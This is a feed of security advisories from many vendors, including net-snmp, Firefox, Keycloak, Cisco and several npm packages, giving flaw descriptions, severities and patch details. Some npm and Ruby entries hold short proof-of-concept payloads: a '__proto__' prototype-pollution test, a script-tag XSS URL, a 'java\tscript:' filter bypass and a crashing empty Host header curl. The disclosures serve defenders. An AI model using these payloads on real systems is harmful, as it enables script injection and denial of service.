16.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2022-24807] net-snmp vulnerability (medium)	[From CVE-2022-24807] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a malformed OID in a SET request to `SNMP-VIEW-BASED-ACM-MIB::vacmAccessTable` can cause an out-of-bounds memory access. A user with read-write credentials can exploit the issue. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24807
16.04.2024 23:15:08	alpinelinux	[ALPINE:CVE-2022-24808] net-snmp vulnerability (medium)	[From CVE-2022-24808] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a `SET` request to `NET-SNMP-AGENT-MIB::nsLogTable` to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24808
16.04.2024 23:15:07	alpinelinux	[ALPINE:CVE-2022-24805] net-snmp vulnerability (medium)	[From CVE-2022-24805] net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a buffer overflow in the handling of the `INDEX` of `NET-SNMP-VACM-MIB` can cause an out-of-bounds memory access. A user with read-only credentials can exploit the issue. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2022-24805
16.04.2024 23:07:50	ubuntu	[USN-6724-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6724-2
16.04.2024 21:53:34	slackware	[SSA:2024-107-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.10.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-19/ https://www.cve.org/CVERecord?id=CVE-2024-3852 https://www.cve.org/CVERecord?id=CVE-2024-3854 https://www.cve.org/CVERecord?id=CVE-2024-3857 https://www.cve.org/CVERecord?id=CVE-2024-2609 https://www.cve.org/CVERecord?id=CVE-2024-3859 https://www.cve.org/CVERecord?id=CVE-2024-3861 https://www.cve.org/CVERecord?id=CVE-2024-3863 https://www.cve.org/CVERecord?id=CVE-2024-3302 https://www.cve.org/CVERecord?id=CVE-2024-3864 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.10.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.10.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.10.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.10.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:6fc4d1333dca494396f1ddda30956558 mozilla-firefox-115.10.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:a3b0fc920fccd4242a80186833ef9732 mozilla-firefox-115.10.0esr-x86_64-1_slack15.0.txzSlackware -current package:dd3c39d4b6e117992b6bf4e10fdb2145 xap/mozilla-firefox-115.10.0esr-i686-1.txzSlackware x86_64 -current package:f67526bba7676157c6dd19870ceb0ee4 xap/mozilla-firefox-115.10.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.10.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-107-01
16.04.2024 14:43:39	ubuntu	[USN-6736-1] klibc vulnerabilities (critical)	Several security issues were fixed in klibc.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6736-1
16.04.2024 14:31:52	ubuntu	[USN-6735-1] Node.js vulnerabilities (high)	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6735-1
16.04.2024 03:00:00	debian	[DSA-5662-1] apache2 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5662-1
16.04.2024 03:00:00	debian	[DSA-5655-2] cockpit	regression update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5655-2
16.04.2024 03:00:00	mozilla	[MFSA-2024-19] Security Vulnerabilities fixed in Firefox ESR 115.10 (high)	- CVE-2024-2609: Permission prompt input delay could expire when not in focus (moderate)The permission prompt input delay could expire while the window is not in focus. This makes it vulnerable to clickjacking by malicious websites.- CVE-2024-3302: Denial of Service using HTTP/2 CONTINUATION frames (low)There was no limit to the number of HTTP/2 CONTINUATION frames that would be processed. A server could abuse this to create an Out of Memory condition in the browser.- CVE-2024-3852: GetBoundName in the JIT returned the wrong object (high)GetBoundName could return the wrong version of an object when JIT optimizations were applied.- CVE-2024-3854: Out-of-bounds-read after mis-optimized switch statement (high)In some code patterns the JIT incorrectly optimized switch statements and generated code with out-of-bounds-reads.- CVE-2024-3857: Incorrect JITting of arguments led to use-after-free during garbage collection (high)The JIT created incorrect code for arguments in certain cases. This led to potential use-after-free crashes during garbage collection.- CVE-2024-3859: Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (moderate)On 32-bit versions there were integer-overflows that led to an out-of-bounds-read that potentially could be triggered by a malformed OpenType font.- CVE-2024-3861: Potential use-after-free due to AlignedBuffer self-move (moderate)If an AlignedBuffer were assigned to itself, the subsequent self-move could result in an incorrect reference count and later use-after-free.- CVE-2024-3863: Download Protections were bypassed by .xrm-ms files on Windows (moderate)The executable file warning was not presented when downloading .xrm-ms files. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-3864: Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (high)Memory safety bug present in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-19
16.04.2024 03:00:00	mozilla	[MFSA-2024-18] Security Vulnerabilities fixed in Firefox 125 (high)	- CVE-2024-3302: Denial of Service using HTTP/2 CONTINUATION frames (low)There was no limit to the number of HTTP/2 CONTINUATION frames that would be processed. A server could abuse this to create an Out of Memory condition in the browser.- CVE-2024-3852: GetBoundName in the JIT returned the wrong object (high)GetBoundName could return the wrong version of an object when JIT optimizations were applied.- CVE-2024-3853: Use-after-free if garbage collection runs during realm initialization (high)A use-after-free could result if a JavaScript realm was in the process of being initialized when a garbage collection started.- CVE-2024-3854: Out-of-bounds-read after mis-optimized switch statement (high)In some code patterns the JIT incorrectly optimized switch statements and generated code with out-of-bounds-reads.- CVE-2024-3855: Incorrect JIT optimization of MSubstr leads to out-of-bounds reads (high)In certain cases the JIT incorrectly optimized MSubstr operations, which led to out-of-bounds reads.- CVE-2024-3856: Use-after-free in WASM garbage collection (high)A use-after-free could occur during WASM execution if garbage collection ran during the creation of an array.- CVE-2024-3857: Incorrect JITting of arguments led to use-after-free during garbage collection (high)The JIT created incorrect code for arguments in certain cases. This led to potential use-after-free crashes during garbage collection.- CVE-2024-3858: Corrupt pointer dereference in js::CheckTracedThing<js::Shape> (high)It was possible to mutate a JavaScript object so that the JIT could crash while tracing it.- CVE-2024-3859: Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (moderate)On 32-bit versions there were integer-overflows that led to an out-of-bounds-read that potentially could be triggered by a malformed OpenType font.- CVE-2024-3860: Crash when tracing empty shape lists (moderate)An out-of-memory condition during object initialization could result in an empty shape list. If the JIT subsequently traced the object it would crash.- CVE-2024-3861: Potential use-after-free due to AlignedBuffer self-move (moderate)If an AlignedBuffer were assigned to itself, the subsequent self-move could result in an incorrect reference count and later use-after-free.- CVE-2024-3862: Potential use of uninitialized memory in MarkStack assignment operator on self-assignment (moderate)The MarkStack assignment operator, part of the JavaScript engine, could access uninitialized memory if it were used in a self-assignment.- CVE-2024-3863: Download Protections were bypassed by .xrm-ms files on Windows (moderate)The executable file warning was not presented when downloading .xrm-ms files. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-3864: Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (high)Memory safety bug present in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code.- CVE-2024-3865: Memory safety bugs fixed in Firefox 125 (high)Memory safety bugs present in Firefox 124. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-18
18.04.2024 01:26:38	npm	[NPM:GHSA-82JV-9WJW-PQH6] Prototype pollution in emit function (low)	### SummaryA prototype pollution in derby can crash the application, if the application author has atypical HTML templates that feed user input into an object key.Attribute keys are almost always developer-controlled, not end-user-controlled, so this shouldn't be an issue in practice for most applications.### Details```emit(context: Context, target: T) { const node = traverseAndCreate(context.controller, this.segments); node[this.lastSegment] = target; this.addListeners(target, node, this.lastSegment);}```The emit() function in src/templates/templates.ts is called without sanitizing the variable `this.lastSegment `. The variable `this.lastSegment ` can be set to `__proto__`, and this will pollute the prototype of Javascipt Object (`node['__proto__'] = target`).### PoCTo reproduce this vulnerability, you can adjust the test case `ignores DOM mutations in components\' create()` in `test/dom/ComponentHarness.mocha.js`.```it('ignores DOM mutations in components\' create()', function() { function Box() {} Box.view = { is: 'box',- source: '<index:><div class="box" as="boxElement"></div>'+ source: '<index:><div class="box" as="__proto__"></div>' }; Box.prototype.create = function() { this.boxElement.className = 'box-changed-in-create'; }; var harness = runner.createHarness('<view is="box" />', Box); expect(harness).to.render('<div class="box"></div>');});```When `as` attribute is controlled by attackers, the variable in `this.lastSegment` will exactly take value` __proto__` and prototype pollution happens.### PatchAdd a check on `this.lastSegment` can prevent this attack.```emit(context: Context, target: T) { const node = traverseAndCreate(context.controller, this.segments);+ if (this.lastSegment.includes('__proto__') \|\| this.lastSegment.includes('prototype')) {+ throw new Error('Unsafe code detected');+ } node[this.lastSegment] = target; this.addListeners(target, node, this.lastSegment);}```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-82JV-9WJW-PQH6
18.04.2024 03:31:05	npm	[NPM:GHSA-M64Q-4JQH-F72F] Stored Cross-site Scripting (XSS) in excalidraw's web embed component (moderate)	### SummaryA stored XSS vulnerability in Excalidraw's web embeddable component. This allows arbitrary JavaScript to be run in the context of the domain where the editor is hosted. ### PocInserting an embed with the below url (can be copy/pasted onto canvas to insert as embed) will log `42` to the console:```https://gist.github.com/vv=v<script>console.log(42)</script>```### DetailsThere were two vectors. One rendering untrusted string as iframe's `srcdoc` without properly sanitizing against HTML injection. Second by improperly sanitizing against attribute HTML injection. This in conjunction with allowing `allow-same-origin` sandbox flag (necessary for several embeds) resulted in the XSS.Former was fixed by no longer rendering unsafe `srcdoc` content verbatim, and instead strictly parsing the supplied content and constructing the `srcdoc` manually. The latter by sanitizing properly.The `allow-same-origin` flag is now also set only in cases that require it, following the principle of least privilege.### ImpactThis is a cross site scripting vulnerability, for more information, please see: https://portswigger.net/web-security/cross-site-scriptingTwo npm `@excalidraw/excalidraw` stable version releases were affected (`0.16.x`, `0.17.x`), and both are now patched.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M64Q-4JQH-F72F
17.04.2024 23:42:46	slackware	[SSA:2024-108-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.10.0/releasenotes/ https://www.mozilla.org/en-US/security/known-vulnerabilities/thunderbird/#thunderbird115.10 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.10.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.10.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.10.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.10.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a745479bb3b4f14dfec630e5374fb0d3 mozilla-thunderbird-115.10.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:5b00ddd1e6847325ecda26dc6af10179 mozilla-thunderbird-115.10.0-x86_64-1_slack15.0.txzSlackware -current package:771573cbbcfa34c1d26dffb3e92d783f xap/mozilla-thunderbird-115.10.0-i686-1.txzSlackware x86_64 -current package:dee5b9d034569a279d52215f01f0e879 xap/mozilla-thunderbird-115.10.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-108-01
17.04.2024 21:26:00	maven	[MAVEN:GHSA-7FPJ-9HR8-28VH] Keycloak vulnerable to impersonation via logout token exchange (low)	Keycloak was found to not properly enforce token types when validating signatures locally. An authenticated attacker could use this flaw to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7FPJ-9HR8-28VH
17.04.2024 21:25:30	maven	[MAVEN:GHSA-C9H6-V78W-52WJ] Keycloak vulnerable to session hijacking via re-authentication (moderate)	A flaw was found in Keycloak. An active keycloak session can be hijacked by initiating a new authentication (having the query parameter prompt=login) and forcing the user to enter his credentials once again. If the user cancels this re-authentication by clicking Restart login, the account takeover could take place as the new session, with a different SUB, will have the same SID as the previous session.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C9H6-V78W-52WJ
17.04.2024 21:25:09	maven	[MAVEN:GHSA-72VP-XFRC-42XM] Keycloak path transversal vulnerability in redirection validation (high)	A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field.#### Acknowledgements:Special thanks to Axel Flamcourt for reporting this issue and helping us improve our project.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-72VP-XFRC-42XM
17.04.2024 21:24:39	maven	[MAVEN:GHSA-M6Q9-P373-G5Q8] Keycloak's unvalidated cross-origin messages in checkLoginIframe leads to DDoS (high)	A potential security flaw in the "checkLoginIframe" which allows unvalidated cross-origin messages, enabling potential DDoS attacks. By exploiting this vulnerability, attackers could coordinate to send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.#### AcknowledgementsSpecial thanks to Adriano Márcio Monteiro from BRZTEC for reporting this issue and helping us improve our project.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M6Q9-P373-G5Q8
17.04.2024 21:24:04	maven	[MAVEN:GHSA-J628-Q885-8GR5] Keycloak vulnerable to log Injection during WebAuthn authentication or registration (low)	A flaw was found in keycloak 22.0.5. Errors in browser client during setup/auth with "Security Key login" (WebAuthn) are written into the form, send to Keycloak and logged without escaping allowing log injection.Acknowledgements:Special thanks toTheresa Henze for reporting this issue and helping us improve our security.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J628-Q885-8GR5
18.04.2024 00:29:14	npm	[NPM:GHSA-8M45-2RJM-J347] Handling untrusted input can result in a crash, leading to loss of availability / denial of service (high)	Using particular inputs with `@solana/web3.js` will result in memory exhaustion (OOM).If you have a server, client, mobile, or desktop product that accepts untrusted input for use with `@solana/web3.js`, your application/service may crash, resulting in a loss of availability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8M45-2RJM-J347
17.04.2024 20:33:29	maven	[MAVEN:GHSA-46C8-635V-68R2] Keycloak Authorization Bypass vulnerability (moderate)	Due to a permissive regular expression hardcoded for filtering allowed hosts to register a dynamic client, a malicious user with enough information about the environment could benefit and jeopardize an environment with this specific Dynamic Client Registration with TrustedDomain configuration previously unauthorized.#### Acknowledgements:Special thanks to Bastian Kanbach for reporting this issue and helping us improve our security.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-46C8-635V-68R2
17.04.2024 20:33:06	maven	[MAVEN:GHSA-8RMM-GM28-PJ8Q] Keycloak Cross-site Scripting (XSS) via assertion consumer service URL in SAML POST-binding flow (high)	Keycloak allows arbitrary URLs as SAML Assertion Consumer Service POST Binding URL (ACS), including JavaScript URIs (javascript:).Allowing JavaScript URIs in combination with HTML forms leads to JavaScript evaluation in the context of the embedding origin on form submission.#### Acknowledgements:Special thanks to Lauritz Holtmann for reporting this issue and helping us improve our project.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8RMM-GM28-PJ8Q
17.04.2024 20:31:51	maven	[MAVEN:GHSA-4F53-XH3V-G8X4] Keycloak secondary factor bypass in step-up authentication (moderate)	Keycloak does not correctly validate its client step-up authentication. A password-authed attacker could use this flaw to register a false second auth factor, alongside the existing one, to a targeted account. The second factor then permits step-up authentication.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4F53-XH3V-G8X4
17.04.2024 21:31:33	maven	[MAVEN:GHSA-MRV8-PQFJ-7GP5] Keycloak path traversal vulnerability in the redirect validation (high)	An issue was found in the redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MRV8-PQFJ-7GP5
17.04.2024 19:00:00	cisco	[CISCO-SA-SNMP-UWBXFQWW] Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability (medium)	A vulnerability in the implementation of the Simple Network Management Protocol (SNMP) IPv4 access control list (ACL) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform SNMP polling of an affected device, even if it is configured	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNMP-UWBXFQWW
17.04.2024 19:00:00	cisco	[CISCO-SA-CIMC-CMD-INJ-MUX4C5AJ] Cisco Integrated Management Controller CLI Command Injection Vulnerability (high)	A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-CMD-INJ-MUX4C5AJ
17.04.2024 19:00:00	cisco	[CISCO-SA-CIMC-CMD-INJ-BLUPCB] Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability (high)	A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-CMD-INJ-BLUPCB
17.04.2024 20:35:57	maven	[MAVEN:GHSA-R52H-FJM7-93J8] BlazeMeter Jenkins plugin vulnerable to Cross-Site Request Forgery (moderate)	Versions of the BlazeMeter Jenkins plugin prior to 4.22 contain a flaw which results in credential enumeration.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R52H-FJM7-93J8
17.04.2024 18:26:47	ubuntu	[USN-6729-2] Apache HTTP Server vulnerabilities	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-2
17.04.2024 21:10:53	go	[GO-2024-2730] WITHDRAWN: Directory traversal in FilesystemStore in github.com/gorilla/sessions	(This report has been withdrawn on the grounds that itgenerates too many false positives. Session IDs aredocumented as not being suitable to hold user-provideddata.)FilesystemStore does not sanitize the Session.ID value,making it vulnerable to directory traversal attacks.If an attacker has control over the contents of the session ID,this can be exploited to write to arbitrary files in thefilesystem.Programs which do not set session IDs explicitly,or which only set session IDs that will not beinterpreted by the filesystem, are not vulnerable.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2730
17.04.2024 16:06:30	ubuntu	[USN-6726-3] Linux kernel (Xilinx ZynqMP) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-3
17.04.2024 03:00:00	debian	[DSA-5663-1] firefox-esr	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5663-1
17.04.2024 03:00:00	debian	[DSA-5664-1] jetty9 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5664-1
17.04.2024 03:00:00	debian	[DSA-5665-1] tomcat10 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5665-1
17.04.2024 03:00:00	jenkins	[JENKINS:SECURITY-3386] Terrapin SSH vulnerability in Jenkins CLI client (medium)	The CLI client (`jenkins-cli.jar`) in Jenkins 2.451 and earlier, LTS 2.440.2 and earlier bundles versions of the Apache MINA SSHD library that are susceptible to https://www.cve.org/CVERecord?id=CVE-2023-48795[CVE-2023-48795] (https://en.wikipedia.org/wiki/Terrapin_attack[Terrapin attack]).This vulnerability allows a machine-in-the-middle attacker to reduce the security of an SSH connection.NOTE: This only affects the Jenkins CLI client when using the `-ssh` connection mode, which is not the default.The CLI client (`jenkins-cli.jar`) in Jenkins 2.452, LTS 2.440.3 bundles version 2.12.1 of the Apache MINA SSHD library, which is unaffected by this issue.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3386
17.04.2024 03:00:00	oraclelinux	[ELSA-2024-1817] java-1.8.0-openjdk security update (moderate)	[1:1.8.0.412.b08-1]- Update to shenandoah-jdk8u412-b08 (GA)- Update release notes for shenandoah-8u412-b08.- Complete release note for Certainly roots- Switch to GA mode.- This tarball is embargoed until 2024-04-16 @ 1pm PT. - Related: RHEL-30926[1:1.8.0.412.b07-0.1.ea]- Update to shenandoah-jdk8u412-b07 (EA)- Update release notes for shenandoah-8u412-b07.- Require tzdata 2024a due to upstream inclusion of JDK-8322725- Only require tzdata 2023d for now as 2024a is unavailable in buildroot- Resolves: RHEL-30926[1:1.8.0.412.b01-0.1.ea]- Turn off xz multi-threading on i686 as it fails with an out of memory error- Normalise whitespace- Move to upstream tag style (shenandoah8ux-by) in preparation for eventually moving back to official sources- generate_source_tarball.sh: Rename JCONSOLE_JS_PATCH{,_DEFAULT} to JCONSOLE_PATCH{,_DEFAULT} for brevity- generate_source_tarball.sh: Adapt OPENJDK_LATEST logic to work with 8u Shenandoah fork- generate_source_tarball.sh: Adapt version logic to work with 8u- generate_source_tarball.sh: Add quoting for SCRIPT_DIR and JCONSOLE_PATCH (SC2086)- generate_source_tarball.sh: Update examples in header for clarity- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP- generate_source_tarball.sh: Only add --depth=1 on non-local repositories- Move maintenance scripts to a scripts subdirectory- icedtea_sync.sh: Update with a VCS mode that retrieves sources from a Mercurial repository- jconsole.desktop.in: Restored by running icedtea_sync.sh- policytool.desktop.in: Likewise.- Restore IcedTea sources correctly in spec file- discover_trees.sh: Set compile-command and indentation instructions for Emacs- discover_trees.sh: shellcheck: Do not use -o (SC2166)- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)- generate_source_tarball.sh: Add authorship- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: Set compile-command and indentation instructions for Emacs- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)- generate_source_tarball.sh: Handle an existing checkout- generate_source_tarball.sh: Sync indentation with java-21-openjdk version- generate_source_tarball.sh: Support using a subdirectory via TO_COMPRESS- Related: RHEL-30926[1:1.8.0.412.b01-0.1.ea]- Invoke xz in multi-threaded mode- generate_source_tarball.sh: Add WITH_TEMP environment variable- generate_source_tarball.sh: Multithread xz on all available cores- generate_source_tarball.sh: Add OPENJDK_LATEST environment variable- generate_source_tarball.sh: Update comment about tarball naming- generate_source_tarball.sh: Reformat comment header- generate_source_tarball.sh: Reformat and update help output- generate_source_tarball.sh: Do a shallow clone, for speed- generate_source_tarball.sh: Eliminate some removal prompting- generate_source_tarball.sh: Make tarball reproducible- generate_source_tarball.sh: Prefix temporary directory with temp-- generate_source_tarball.sh: Remove temporary directory exit conditions- generate_source_tarball.sh: Set compile-command in Emacs- generate_source_tarball.sh: Remove REPO_NAME from FILE_NAME_ROOT- generate_source_tarball.sh: Move PROJECT_NAME and REPO_NAME checks- generate_source_tarball.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- generate_source_tarball.sh: shellcheck: Double-quote variable references (SC2086)- generate_source_tarball.sh: shellcheck: Do not use -a (SC2166)- generate_source_tarball.sh: shellcheck: Do not use $ on arithmetic variables (SC2004)- Use backward-compatible patch syntax- generate_source_tarball.sh: Ignore -ga tags with OPENJDK_LATEST- generate_source_tarball.sh: Remove trailing period in echo- generate_source_tarball.sh: Use long-style argument to grep- generate_source_tarball.sh: Add license- generate_source_tarball.sh: Add indentation instructions for Emacs- Remove -T0 argument from systemtap tar invocation- Related: RHEL-30926[1:1.8.0.412.b01-0.1.ea]- Update to shenandoah-jdk8u412-b01 (EA)- Update release notes for shenandoah-8u412-b01.- Switch to EA mode.- Related: RHEL-30926	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1817
17.04.2024 15:52:51	rubysec	[RUBYSEC:PHLEX-G7XQ-XV8C-H98C] Cross-site Scripting (XSS) possible due to improper sanitisation of `href` attributes on `` tags (high)	### SummaryThere is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.### ImpactIf you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.```rubya(href: user_profile) { "Profile" }```### MitigationThe best way to mitigate this vulnerability is to update to one of the following versions:- [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)- [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)- [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)- [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)- [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)- [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)- [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)### WorkaroundsConfiguring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-G7XQ-XV8C-H98C
20.04.2024 00:44:11	npm	[NPM:GHSA-HGXW-5XG3-69JX] @hono/node-server has Denial of Service risk when receiving Host header that cannot be parsed (high)	### ImpactThe application hangs when receiving a Host header with a value that `@hono/node-server` can't handle well. Invalid values are those that cannot be parsed by the `URL` as a hostname such as an empty string, slashes `/`, and other strings.For example, if you have a simple application:```tsimport { serve } from '@hono/node-server'import { Hono } from 'hono'const app = new Hono()app.get('/', (c) => c.text('Hello'))serve(app)```Sending a request with a Host header with an empty value to it:```curl localhost:3000/ -H "Host: "```The results:```node:internal/url:775 this.#updateContext(bindingUrl.parse(input, base)); ^TypeError: Invalid URL at new URL (node:internal/url:775:36) at newRequest (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:137:17) at Server.<anonymous> (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:399:17) at Server.emit (node:events:514:28) at Server.emit (node:domain:488:12) at parserOnIncoming (node:_http_server:1143:12) at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17) { code: 'ERR_INVALID_URL', input: 'http:///'}```### PatchesThe version `1.10.1` includes the fix for this issue. But, you should use `1.11.0`, which has other fixes related to this issue. https://github.com/honojs/node-server/issues/160 https://github.com/honojs/node-server/issues/161### WorkaroundsNothing. Upgrade your `@hono/node-server`.### Referenceshttps://github.com/honojs/node-server/issues/159	